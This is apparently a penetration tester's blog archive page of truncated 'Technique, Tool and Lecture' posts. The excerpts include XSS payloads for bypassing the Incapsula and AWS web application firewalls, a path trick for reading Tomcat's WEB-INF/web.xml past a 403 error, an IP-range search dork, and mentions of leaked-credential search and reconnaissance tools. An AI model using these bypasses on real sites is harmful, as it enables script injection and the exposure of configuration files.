Let me first say that most of these terms are used interchangeability by the majority of outlets (especially media) incorrectly Please note this is VERY incomplete and I will continue to update this as time goes by Types of "Hacker" -- Whitehat Grayhat Blackhat -- Ethical Hacker: Type: Whitehat or Grayhat Someone who actively monitors … Continue reading Difference between Ethical Hacker, Boug Bounty(ier), Penetration Tester, Security Consultant and Security Researcher
Tag: TTL
Technique, Tool and Lecture #7
Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets but then can use * for the right. For example if I'm looking for data on 103.10.1.1/16 I can do site:103.10.* or site:103.10.*.* Remember * aren't wildcards but they are as close as you'll get. Also remember that … Continue reading Technique, Tool and Lecture #7
Technique, Tool and Lecture #6
Hi Guys, Time some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep then in my bag <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: … Continue reading Technique, Tool and Lecture #6
Technique, Tool and Lecture #5
Technique: Quick and Easy Bypass for Tomcat 8 on Windows https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK Haven't had a chance to use this yet, but I'm sure I will soon Source Tool: Karma So awesome! Lets you search by username, domain or password. For example I can search by … Continue reading Technique, Tool and Lecture #5
Technique, Tool and Lecture #4
Another round of techniques, tools and lectures 😀 Technique: This time it is not as much as of a technique but a trove of resources! I have found many resources for books/publications relevant to my career. I'll admit, I'm much more of a fan of physical copies. That said, if you're okay with PDFs then … Continue reading Technique, Tool and Lecture #4
Technique, Tool and Lecture #3
Time for another entry of Technique, Tool and Lecture! Technique: <!<script>alert(1)</script> The key point is the <! which one researcher found sometimes allow bypassing AWS WAF. Yes, that simple... Source Tool:Â Spiderfoot, a great tool for both semi-active and passive reconnaissance! Here are a list of modules that I run when I am at the … Continue reading Technique, Tool and Lecture #3





